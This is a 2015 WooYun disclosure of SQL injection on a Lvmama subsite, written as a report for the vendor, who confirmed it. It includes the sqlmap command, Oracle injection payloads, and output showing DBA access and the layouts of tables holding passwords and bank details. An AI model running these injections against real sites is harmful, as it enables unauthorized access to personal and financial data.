当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153210

漏洞标题:驴妈妈旅游网某站多处存在SQL注入(DBA权限+20个库+400多用户+18个管理员+数万记录信息)

相关厂商:驴妈妈旅游网

漏洞作者: 路人甲

提交时间:2015-11-10 09:30

修复时间:2015-12-25 09:42

公开时间:2015-12-25 09:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-10: 细节已通知厂商并且等待厂商处理中
2015-11-10: 厂商已经确认,细节仅向厂商公开
2015-11-20: 细节向核心白帽子及相关领域专家公开
2015-11-30: 细节向普通白帽子公开
2015-12-10: 细节向实习白帽子公开
2015-12-25: 细节向公众公开

简要描述:

昨晚找到,但是太累了,没有测试,今早起来稍微早点,利用一点点时间测试一下!~~~!~~

详细说明:

有礼物的么?呵呵!~~~
注入点:
http://fenxiao.lvmama.com/m2c/2/list0.jsp?action=prodlist&view_id=lfsqwc&tree_id=0&sdate=2015-11-11
估计已经修复了,sqlmap就直接添加参数--level 3 --risk 3进行测试,其中两个参数均存在注入!~~~
sqlmap.py -u "http://fenxiao.lvmama.com/m2c/2/list0.jsp?action=prodlist&view_id=lfsqwc&tree_id=0&sdate=2015-11-11" --
threads 10 --dbms "Oracle" --level 3 --risk 3 -p action,view_id,tree_id,sdate --current-user --current-db --is-dba
测试结果发现view_id,tree_id均存在修复不严,依旧存在漏洞

1.jpg


2.jpg


[08:03:30] [WARNING] GET parameter 'sdate' is not injectable
sqlmap identified the following injection points with a total of 2729 HTTP(s) re
quests:
---
Place: GET
Parameter: tree_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=prodlist&view_id=lfsqwc&tree_id=0 AND 7040=7040&sdate=2015-1
1-11
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: action=prodlist&view_id=lfsqwc&tree_id=0 AND 2498=(SELECT UPPER(XML
Type(CHR(60)||CHR(58)||CHR(113)||CHR(109)||CHR(118)||CHR(113)||CHR(113)||(SELECT
(CASE WHEN (2498=2498) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(1
13)||CHR(99)||CHR(113)||CHR(62))) FROM DUAL)&sdate=2015-11-11
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: action=prodlist&view_id=lfsqwc&tree_id=0 AND 4368=DBMS_PIPE.RECEIVE
_MESSAGE(CHR(112)||CHR(79)||CHR(80)||CHR(67),5)&sdate=2015-11-11
Place: GET
Parameter: view_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=prodlist&view_id=lfsqwc' AND 2948=2948 AND 'KuUs'='KuUs&tree
_id=0&sdate=2015-11-11
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: action=prodlist&view_id=lfsqwc' AND 1770=(SELECT UPPER(XMLType(CHR(
60)||CHR(58)||CHR(113)||CHR(109)||CHR(118)||CHR(113)||CHR(113)||(SELECT (CASE WH
EN (1770=1770) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(113)||CHR(
99)||CHR(113)||CHR(62))) FROM DUAL) AND 'zMWH'='zMWH&tree_id=0&sdate=2015-11-11
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: action=prodlist&view_id=lfsqwc' AND 3721=DBMS_PIPE.RECEIVE_MESSAGE(
CHR(111)||CHR(120)||CHR(70)||CHR(90),5) AND 'wPuV'='wPuV&tree_id=0&sdate=2015-11
-11
---
there were multiple injection points, please select the one to use for following
injections:
[0] place: GET, parameter: view_id, type: Single quoted string (default)
[1] place: GET, parameter: tree_id, type: Unescaped numeric
[q] Quit
> 0
[08:13:09] [INFO] the back-end DBMS is Oracle
web application technology: Apache, JSP
back-end DBMS: Oracle
[08:13:28] [INFO] fetching current user
[08:13:28] [INFO] retrieved: SAAS14
current user: 'SAAS14'
[08:13:28] [INFO] fetching current database
[08:13:28] [INFO] resumed: SAAS14
[08:13:28] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'SAAS14'
[08:13:28] [INFO] testing if current user is DBA
current user is DBA: True
available databases [20]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SAAS14
[*] SAAS15
[*] SAAS16
[*] SAAS17
[*] SAAS18
[*] SAAS19
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
Database: SAAS19
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| USR_LOG | 58 |
| INFO_HOTEL_NUM | 44 |
| WX_USER_INFO | 44 |
| USR_LOGIN_LOG | 40 |
| INTERFACE_PROD_SYNC_LOG | 22 |
| USR_INFO | 10 |
| USR_LOGIN | 10 |
| INFO_TICKET | 9 |
| INFO_TICKET_RELVIEW | 9 |
| INFO_HOTEL | 8 |
| WX_SCENE_LOG | 6 |
| B2B_TICKET | 3 |
| B2B_TICKET_DETAIL | 3 |
| B2B_TICKET_PEOPLE | 3 |
| ORDER_LOG | 3 |
| USR_CREDIT_LOG | 3 |
| USR_GETPASS_LOG | 3 |
| USR_GRADE | 3 |
| B2B_GRADE_PRICE | 2 |
| INFO_TICKET_CUST | 2 |
| INFO_TICKET_NUM | 2 |
| USR_DOCUMENT_TEMP | 2 |
| USR_INFO_EXPRESS | 2 |
| USR_INTERFACE_INFO | 2 |
| WX_MSG | 2 |
| INFO_CONDS | 1 |
| INFO_NEWS | 1 |
| INFO_TICKET_EX | 1 |
| INFO_TICKET_PRICE | 1 |
| RECE_PAYMENT_DETAIL | 1 |
| RECE_PAYMENT_LIST | 1 |
| RECE_STATEMENT_LIST | 1 |
| USR_ACCOUNT_SET | 1 |
| USR_CREDIT | 1 |
| USR_PRINT_TEMP | 1 |
+-------------------------+---------+
Database: SAAS14
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| LVMAMA_PUSH_LOG | 2508709 |
| LVMAMA_VIEW | 69067 |
| USR_LOG | 57394 |
| CM_ORDER_LOG | 49478 |
| B2B_TICKET_PEOPLE | 32639 |
| PAY_ORDER_LOG | 29497 |
| B2B_TICKET | 28058 |
| B2B_TICKET_DETAIL | 28058 |
| B2B_TICKET_EX | 28029 |
| CM_SYNC_LOG | 27699 |
| INTERFACE_LVMAMA_LOG | 25790 |
| LVMAMA_PRODUCT_LIST | 23297 |
| INFO_TICKET | 23296 |
| ORDER_LOG | 22104 |
| INFO_TICKET_RELVIEW | 16531 |
| LVMAMA_CHUANHUO_LOG | 14636 |
| USR_LOGIN_LOG | 11414 |
| CM_PROD_LOG | 4591 |
| CM_SYNC_PROD_LOG | 4141 |
| PAY_BALANCE | 3770 |
| PAY_MOMEY_LOG | 2681 |
| B2B_TICKET_CHANGE | 1330 |
| B2B_CHANNEL_PRICE | 645 |
| LVMAMA_VIEW_INFO | 610 |
| INFO_TICKET_NUM | 559 |
| USR_LOGIN | 439 |
| INFO_TICKET_CUST | 417 |
| USR_INFO | 385 |
| B2B_CHANNEL_PRICE_DAY | 382 |
| USR_CREDIT_LOG | 369 |
| WX_SCENE_LOG | 308 |
| USR_GETPASS_LOG | 208 |
| INFO_TICKET_EX | 136 |
| LVMAMA_PRODUCT_INFO | 72 |
| USR_ATTENTION | 65 |
| ORDER_ABNORMAL_LOG | 51 |
| USR_INFO_B2C | 45 |
| WX_USER_INFO | 45 |
| USR_INTERFACE_INFO | 41 |
| INTERFACE_PROD_SYNC_LOG | 32 |
| WX_AD_DETAIL | 23 |
| USR_MEMBER | 18 |
| INFO_TICKET_PRICE | 6 |
| ORDER_CHANGE_LOG | 5 |
| WX_AD | 5 |
| USR_CREDIT | 4 |
| WX_AD_SEND_LOG | 4 |
| WX_MSG_TEMP | 2 |
| CUST_INFO_GROUP_CHANNEL | 1 |
| INFO_CONDS | 1 |
| INFO_TICKET_CANCEL | 1 |
| INTERFACE_XIECHENG_LOG | 1 |
| LVMAMA_UPDATE_FLAG | 1 |
| SAAS_DATAMAN | 1 |
| USR_DOCUMENT_TEMP | 1 |
| USR_INFO_EXPRESS | 1 |
| WX_ORDER_TASK | 1 |
+-------------------------+---------+
Database: SAAS14
Table: USR_LOG
[7 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| CUST_ID | NUMBER |
| LOG_DATE | DATE |
| LOG_DESC | VARCHAR2 |
| LOG_NUM | VARCHAR2 |
| LOG_TYPE | NUMBER |
| PARENT_CUST_ID | NUMBER |
| USER_ID | VARCHAR2 |
+----------------+----------+
Database: SAAS14
Table: USR_LOGIN_LOG
[7 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| COOKIEID | VARCHAR2 |
| CUST_ID | NUMBER |
| IP | VARCHAR2 |
| LOGIN_DATE | DATE |
| LOGIN_TYPE | NUMBER |
| PARENT_CUST_ID | NUMBER |
| USER_ID | VARCHAR2 |
+----------------+----------+
Database: SAAS14
Table: USR_INFO_EXPRESS
[9 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| ACCOUNT_NO | VARCHAR2 |
| CUST_ID | NUMBER |
| FROM_ADDRESS | VARCHAR2 |
| FROM_COM | VARCHAR2 |
| FROM_MAN | VARCHAR2 |
| FROM_TEL | VARCHAR2 |
| PARENT_CUST_ID | NUMBER |
| SHIP_INFO | VARCHAR2 |
| UPDATE_DATE | DATE |
+----------------+----------+
Database: SAAS14
Table: USR_CREDIT
[8 columns]
+----------------+--------+
| Column | Type |
+----------------+--------+
| ALL_CREDIT_NUM | NUMBER |
| CREATE_DATE | DATE |
| CREDIT_CUST_ID | NUMBER |
| CREDIT_NUM | NUMBER |
| CREDIT_TYPE | NUMBER |
| CUST_ID | NUMBER |
| ID | NUMBER |
| USE_CREDIT_NUM | NUMBER |
+----------------+--------+
Database: SAAS14
Table: USR_INFO
[95 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| KEY | VARCHAR2 |
| ACCOUNT | VARCHAR2 |
| ACCOUNT_NAME | VARCHAR2 |
| AGREEMENT_DATE | DATE |
| AGREEMENT_IP | VARCHAR2 |
| AGREEMENT_USER | VARCHAR2 |
| ANDROID_UID | VARCHAR2 |
| AREA_ID | NUMBER |
| ATTENT_COUNT | NUMBER |
| BANK_ACCOUNT_NAME | VARCHAR2 |
| BANK_ACCOUNT_NO | VARCHAR2 |
| BANK_CITY | VARCHAR2 |
| BANK_CITYCODE | VARCHAR2 |
| BANK_NAME | VARCHAR2 |
| BANK_PROVINCE | VARCHAR2 |
| BANK_TYPE | VARCHAR2 |
| BEIANHAO | VARCHAR2 |
| CHECK_PRINT_NUM | NUMBER |
| CHECK_PRINT_PRICE | VARCHAR2 |
| CONTRACT_END_DATE | DATE |
| CONTRACT_PERSON | VARCHAR2 |
| CONTRACT_START_DATE | DATE |
| CURRENCY_TYPE | NUMBER |
| CUST_CODE | VARCHAR2 |
| CUST_DESC | CLOB |
| CUST_GAT_FEE | NUMBER |
| CUST_GAT_LIMIT | NUMBER |
| CUST_GRADE | NUMBER |
| CUST_ID | NUMBER |
| CUST_NAME | VARCHAR2 |
| CUST_PAY_FEE | NUMBER |
| CUST_TYPE | NUMBER |
| CUST_WEBSITE | VARCHAR2 |
| DEPOSIT | NUMBER |
| DYCON | VARCHAR2 |
| DYSHOW | NUMBER |
| FEE | NUMBER |
| GET_MONEY_MODE | NUMBER |
| INTERFACE_PAY_TYPE | NUMBER |
| IS_B2B | NUMBER |
| IS_CHECK | NUMBER |
| IS_CHECK_VALUES | VARCHAR2 |
| IS_CONFIRM_ORDER | NUMBER |
| IS_DISCOUNT | NUMBER |
| IS_GAT_MONEY | NUMBER |
| IS_GROUP | NUMBER |
| IS_POST | NUMBER |
| IS_PRODMANAGER | NUMBER |
| IS_SAAS | NUMBER |
| IS_SENDSMS | NUMBER |
| IS_WHILE | NUMBER |
| LAST_IP | VARCHAR2 |
| LINK_ADDRESS | VARCHAR2 |
| LINK_EMAIL | VARCHAR2 |
| LINK_FAX | VARCHAR2 |
| LINK_MOBILE | VARCHAR2 |
| LINK_NAME | VARCHAR2 |
| LINK_PHONE | VARCHAR2 |
| LINK_QQ | VARCHAR2 |
| LINK_SOURCE | VARCHAR2 |
| LOGIN_COUNT | NUMBER |
| LOGO | VARCHAR2 |
| MANAGER_MEMO | CLOB |
| ORDER_COUNT | NUMBER |
| ORDER_CUST_POWER | NUMBER |
| ORDER_MONEY | NUMBER |
| ORDER_POWER_FIELD | VARCHAR2 |
| ORDER_TICKET | NUMBER |
| PARENT_AGENT_ID | NUMBER |
| PARENT_CUST_ID | NUMBER |
| PAY_MODE | NUMBER |
| PRICESTATE_PUSHMAIL | VARCHAR2 |
| PROD_COUNT | NUMBER |
| REG_DATE | DATE |
| REG_IP | VARCHAR2 |
| REMARK | VARCHAR2 |
| REPORT_POWER | VARCHAR2 |
| RETURN_MODE | NUMBER |
| SALE_CHANNEL | VARCHAR2 |
| SALE_COUNT | NUMBER |
| SALE_MONEY | NUMBER |
| SALE_TICKET | NUMBER |
| SALE_TYPE | NUMBER |
| SEAL_PATH | VARCHAR2 |
| SENDMSG_MOBILE | VARCHAR2 |
| SENDMSG_SMS | VARCHAR2 |
| SERVICE_FEE_PAY | NUMBER |
| SOURCE_URL | VARCHAR2 |
| STATE | NUMBER |
| STOP_DATE | DATE |
| STOP_IP | VARCHAR2 |
| STOP_USER | VARCHAR2 |
| USER_ID | VARCHAR2 |
| VIP | NUMBER |
| WHILE_RELCODE | VARCHAR2 |
+---------------------+----------+
Database: SAAS14
Table: PAY_MOMEY_LOG
[17 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| CUR_BALANCE | NUMBER |
| CUST_ID | NUMBER |
| ID | NUMBER |
| PARENT_CUST_ID | NUMBER |
| PAY_ACCOUNT | VARCHAR2 |
| PAY_BALANCE_ID | NUMBER |
| PAY_DATE | DATE |
| PAY_LOG | CLOB |
| PAY_NUM | NUMBER |
| PAY_SERVICE | VARCHAR2 |
| PAY_SERVICE_ORDER_ID | VARCHAR2 |
| PAY_TYPE | NUMBER |
| REC_BALANCE | NUMBER |
| STATE | NUMBER |
| USER_ID | VARCHAR2 |
| USER_REMARK | CLOB |
| WORKFLOWNO | VARCHAR2 |
+----------------------+----------+
Database: SAAS14
Table: USR_MEMBER
[26 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| ACCOUNT | VARCHAR2 |
| ACCOUNT_NAME | VARCHAR2 |
| BANK_ACCOUNT_NAME | VARCHAR2 |
| BANK_ACCOUNT_NO | VARCHAR2 |
| BANK_CITY | VARCHAR2 |
| BANK_NAME | VARCHAR2 |
| BANK_PROVINCE | VARCHAR2 |
| BANK_TYPE | VARCHAR2 |
| BOOK_COUNT | NUMBER |
| DEPOSIT | NUMBER |
| EMAIL | VARCHAR2 |
| IMG | VARCHAR2 |
| LAST_LOGIN | DATE |
| LOGIN_COUNT | NUMBER |
| LOGIN_TYPE | NUMBER |
| MOBILE | VARCHAR2 |
| ORDER_COUNT | NUMBER |
| ORDER_CUST_ID | NUMBER |
| OUT_USER_ID | VARCHAR2 |
| PARENT_CUST_ID | NUMBER |
| PASSWORD | VARCHAR2 |
| REG_DATE | DATE |
| STATUS | NUMBER |
| USER_ID | NUMBER |
| USER_NAME | VARCHAR2 |
| VCODE | VARCHAR2 |
+-------------------+----------+
Database: SAAS14
Table: WX_USER_INFO
[21 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| AREA_ID | NUMBER |
| CITY | VARCHAR2 |
| COUNTRY | VARCHAR2 |
| CREATE_DATE | DATE |
| CUST_ID | NUMBER |
| HEADIMGURL | VARCHAR2 |
| LOGIN_DATE | DATE |
| NICKNAME | VARCHAR2 |
| OPENID | VARCHAR2 |
| ORDER_CUST_ID | NUMBER |
| PARENT_CUST_ID | NUMBER |
| PROVINCE | VARCHAR2 |
| SEX | NUMBER |
| SOURCE_ID | NUMBER |
| STATE | NUMBER |
| SUBSCRIBE_TIME | DATE |
| TREE_ID | NUMBER |
| UNSUBSCRIBE_TIME | DATE |
| USER_ID | VARCHAR2 |
| USER_LANGUAGE | VARCHAR2 |
| USER_MEMO | VARCHAR2 |
+------------------+----------+
Database: SAAS14
Table: USR_LOGIN
[32 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| CUST_ID | NUMBER |
| CZ_STARTTIME | DATE |
| CZCODE | VARCHAR2 |
| DEPT_ID | NUMBER |
| DUTY_STATE | NUMBER |
| DYCON | VARCHAR2 |
| DYSHOW | NUMBER |
| EMAIL | VARCHAR2 |
| FAX | VARCHAR2 |
| IS_CZ | NUMBER |
| IS_DISPRICE | NUMBER |
| IS_MANAGER | NUMBER |
| IS_ORDERLIST | NUMBER |
| IS_PAY | NUMBER |
| IS_SHOWSYSTEMMSG | NUMBER |
| IS_VALIDATE | NUMBER |
| LAST_DATE | DATE |
| LAST_IP | VARCHAR2 |
| LOGIN_COUNT | NUMBER |
| LYT_ID | VARCHAR2 |
| MOBILE | VARCHAR2 |
| PARENT_AGENT_ID | NUMBER |
| PASSWORD | VARCHAR2 |
| PHONE | VARCHAR2 |
| PWD | VARCHAR2 |
| ROLE_ID | NUMBER |
| ROLE_TYPE | NUMBER |
| USER_GRADE | NUMBER |
| USER_ID | VARCHAR2 |
| USER_NAME | VARCHAR2 |
| USER_PERMISSION | VARCHAR2 |
| USER_STATE | NUMBER |
+------------------+----------+


3.jpg


4.jpg


5.jpg


6.jpg


时间关系,不做证明或者帐号密码了!~~~

漏洞证明:

如上

修复方案:

你们懂得!~~~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-11-10 09:42

厂商回复:

thx

最新状态:

暂无


漏洞评价:

评价